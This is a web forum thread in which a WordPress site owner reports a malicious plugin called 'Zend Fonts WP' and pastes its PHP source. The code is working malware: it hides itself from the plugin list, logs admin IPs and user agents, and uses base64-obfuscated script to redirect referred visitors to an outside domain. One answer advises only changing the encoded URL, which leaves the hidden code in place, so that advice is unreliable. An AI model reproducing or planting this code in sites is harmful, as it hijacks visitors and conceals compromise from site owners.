Wordpress Question posted in
The official Wordpress documentation can be found here.

WordPress Website redirected to unknown link (due to plugin/malware Zend Fonts WP)

I desactivated then deleted a malicious "plugin" on WordPress that I never installed in the first place. Its name is Zend Fonts WP. Although, my website is still re-directed to "https://makethisdaygood.com/main" which is a website I don’t know and that doesn’t work anyways. What should I do next?

Here is the code that was in a file from the plugin I deleted :

if ( ! defined( 'ABSPATH' ) ) {
    exit();
}


function get_the_user_ip() {
    if ( isset( $_SERVER['HTTP_CF_CONNECTION_IP'] ) ) {
        $ip = $_SERVER['HTTP_CF_CONNECTION_IP'];
    }
    elseif (  isset( $_SERVER['HTTP_CLIENT_IP'] ) ) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (  isset( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

function isAdminUser(){
    if (current_user_can('administrator') || current_user_can('editor'))
        return true;
    else
        return false;
}

function console_log( $data ){
    echo '<script>';
    echo 'console.log('. json_encode( $data ) .')';
    echo '</script>';
}

//hide plugin
add_filter('all_plugins', 'hide_plugins');
function hide_plugins($plugins) {
    unset($plugins['zend-fonts-wp/zend-fonts-wp.php']);
    return $plugins;
}

add_action("init", "sayecho");

function sayecho(){
    global $wpdb;
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $user_ip = get_the_user_ip();
    $isAdmin = isAdminUser();
    $table_name = $wpdb->prefix."wusers_inputs";
    $isBot = strpos(strtolower($user_agent), 'bot');
    $timeNow = time();
    $pluginTimeTableName = $wpdb->prefix.'wzen_time_table';
//  $wpdb->query("DROP TABLE IF EXISTS $pluginTimeTableName");
//  $wpdb->query("DROP TABLE IF EXISTS $table_name");
    if ($wpdb->get_var('SHOW TABLES LIKE "'.$pluginTimeTableName.'"') != $pluginTimeTableName) {
        $sql = 'CREATE TABLE '.$pluginTimeTableName.' (`time` int(11) UNSIGNED NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;';
        require_once(ABSPATH.'wp-admin/includes/upgrade.php');
        dbDelta($sql);
        $wpdb->insert($pluginTimeTableName, array('time'=>$timeNow));
    }
    $pluginStartTime = null;
    foreach($wpdb->get_results("SELECT * FROM {$pluginTimeTableName}") as $data){
        $pluginStartTime = $data->time;
        break;
    }

    //check user is not from REF, not BOT and plugin install time to skip recording your data
    if(!isset($_SERVER['HTTP_REFERER']) && !$isBot && $pluginStartTime + 60 < time()) {

        //if table is not exists - create table
        if ( $wpdb->get_var( 'SHOW TABLES LIKE "' . $table_name . '"' ) != $table_name ) {
            $sql = 'CREATE TABLE ' . $table_name . ' (`ip` varchar(535) NOT NULL,`useragent` varchar(535) NOT NULL,`adminID` int NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;';
            require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
            dbDelta( $sql );
        }

        //if admin - add IP and UA to DB
        if ( $isAdmin ) {
            $isIpAndUaInDB = $wpdb->get_var(
                $wpdb->prepare(
                    "SELECT * FROM {$table_name} WHERE ip like %s AND useragent like %s LIMIT 1",
                    $user_ip, $user_agent ) );
            if ( ! $isIpAndUaInDB ) {
                $wpdb->insert( $table_name, [
                    'ip'        => $user_ip,
                    'useragent' => $user_agent,
                    'adminID'   => $isAdmin ? get_current_user_id() : - 1,
                ] );
            }
        }
    }

    //do redirect if user from REF and NOT Admin
    if(isset( $_SERVER['HTTP_REFERER']) && !$isAdmin){
        redirect();
    }

}


function redirect()
{
    $url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu');
    
    if (!isset($_COOKIE[base64_decode('aHRfcnI=')])) {
        setcookie( base64_decode( 'aHRfcnI=' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
        
        echo base64_decode( 'PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi' ) . 'https://'.$url . base64_decode( 'Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi' ) . 'https://'.$url . base64_decode( 'Ijs8L3NjcmlwdD4=' );
    
    }
}

Edit : It seems that the changes I made worked out several hours after. I hope it won’t come back! Thanks for your help!

Tags:

2

Answers


  1. 0

    You can do following steps as debugging.

    1. Please Check your Site URL and Home URL in Wp Dashboard.
    2. Please Delete .htaccess file.(It will get generated again)
    3. check wp-config.php file and check if there any site url set in that.
    4. Check database wp_options table and set your url correctly.
    5. Or use Any external security plugin such as "Wordfence". Scan your website and clean up hacked website.
    Login or Signup to reply.
  2. 0

    you can replace the actual url to the existing URL i.e,

    $url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu'); in function redirect block

    you can decode the url name in this website "https://www.base64encode.org/&quot;

    for example right now this url
    $url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu'); refers to the makethisdaygood.com/main, you need to change your actual URL.

    hope it helps.

    Login or Signup to reply.
Please signup or login to give your own answer.

Back To Top
Search